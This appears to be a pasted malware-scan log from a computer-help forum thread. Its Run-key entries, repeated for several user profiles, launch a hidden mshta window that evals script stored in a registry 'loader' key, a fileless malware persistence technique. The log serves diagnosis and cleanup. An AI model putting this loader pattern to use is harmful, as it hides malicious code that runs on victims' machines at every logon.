0 Members and 2 Guests are viewing this topic.
PRC - C:\Windows\SysWOW64\svchost.exe [comLaunch] (Microsoft Corporation)PRC - C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation)
O4 - HKU\.DEFAULT..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not foundO4 - HKU\S-1-5-18..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not foundO4 - HKU\S-1-5-19..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not foundO4 - HKU\S-1-5-20..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not foundO4 - HKU\S-1-5-21-1742386255-4278694884-558714565-500..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found